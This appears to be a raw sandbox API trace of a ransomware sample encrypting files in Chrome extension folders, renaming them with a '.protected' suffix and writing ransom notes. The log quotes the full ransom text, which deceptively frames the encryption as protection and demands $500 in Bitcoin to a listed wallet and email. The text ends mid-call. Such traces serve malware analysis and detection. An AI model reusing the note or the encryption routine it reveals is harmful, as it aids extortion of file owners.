(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.661] WriteFile (in: hFile=0x15c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0081.661] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.661] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0081.661] CloseHandle (hObject=0x15c) returned 1 [0081.662] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0081.662] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0081.663] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\RESTORE_FILES.txt") returned 141 [0081.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0081.663] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.663] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0081.664] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.664] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0081.664] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.664] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0081.664] CloseHandle (hObject=0x158) returned 1 [0081.668] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Windows") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="Program Files (x86)") returned -1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="$Recycle.bin") 
returned 1 [0081.668] lstrcmpiW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="System Volume Information") returned -1 [0081.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 123 [0081.668] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2=".") returned 1 [0081.668] lstrcmpW (lpString1="pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="..") returned 1 [0081.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*") returned 125 [0081.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0081.669] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.669] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.669] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\.") returned 125 [0081.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.669] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.669] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0081.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\..") returned 126 [0081.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.670] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Windows") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Program Files") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="Program Files (x86)") returned -1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="$Recycle.bin") returned 1 [0081.670] lstrcmpiW (lpString1="5817.313.0.5_0", lpString2="System Volume Information") returned -1 [0081.670] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned 138 [0081.670] lstrcmpW (lpString1="5817.313.0.5_0", lpString2=".") returned 1 [0081.670] lstrcmpW (lpString1="5817.313.0.5_0", lpString2="..") returned 1 [0081.670] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*") returned 140 [0081.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0081.672] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.672] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.672] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.672] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\.") returned 140 [0081.672] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.672] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.673] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.673] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.673] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\..") returned 141 [0081.673] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.673] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.673] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.673] lstrcmpiW (lpString1="angular.js", 
lpString2="Windows") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="Program Files") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="Program Files (x86)") returned -1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="$Recycle.bin") returned 1 [0081.673] lstrcmpiW (lpString1="angular.js", lpString2="System Volume Information") returned -1 [0081.673] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.673] StrStrIW (lpFirst="angular.js", lpSrch=".protected") returned 0x0 [0081.673] lstrcmpW (lpString1="angular.js", lpString2="RESTORE_FILES.txt") returned -1 [0081.673] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0081.673] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0081.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".txt") returned 0x0 [0081.675] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".rar") returned 0x0 [0081.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js") returned 149 [0081.675] StrStrW (lpFirst="angular.js", lpSrch=".zip") returned 0x0 [0081.675] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.285] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.285] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.286] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.286] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.297] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.297] CloseHandle (hObject=0x160) returned 1 [0082.378] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected") returned 159 [0082.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.protected")) returned 1 [0082.379] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Windows") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Program Files") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="Program Files (x86)") returned -1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="$Recycle.bin") returned 1 [0082.379] lstrcmpiW (lpString1="background_script.js", lpString2="System Volume Information") returned -1 [0082.379] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.379] StrStrIW (lpFirst="background_script.js", lpSrch=".protected") returned 0x0 [0082.379] lstrcmpW (lpString1="background_script.js", lpString2="RESTORE_FILES.txt") returned 
-1 [0082.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".txt") returned 0x0 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".rar") returned 0x0 [0082.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0082.380] StrStrW (lpFirst="background_script.js", lpSrch=".zip") returned 0x0 [0082.380] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) 
returned 1 [0082.414] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.415] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0082.415] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.415] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0082.416] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0082.416] CloseHandle (hObject=0x160) returned 1 [0082.416] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected") returned 169 [0082.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.protected")) returned 1 [0082.417] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Windows") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Program Files") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="Program Files (x86)") returned -1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="$Recycle.bin") returned 1 [0082.417] lstrcmpiW (lpString1="cast_game_sender.js", lpString2="System Volume Information") returned -1 [0082.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.417] StrStrIW (lpFirst="cast_game_sender.js", lpSrch=".protected") returned 0x0 [0082.417] lstrcmpW (lpString1="cast_game_sender.js", lpString2="RESTORE_FILES.txt") returned -1 [0082.417] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0082.417] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0082.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0082.418] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".txt") returned 0x0 [0082.418] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js") returned 158 [0082.418] StrStrW (lpFirst="cast_game_sender.js", lpSrch=".rar") returned 0x0 [0082.418] lstrlenW 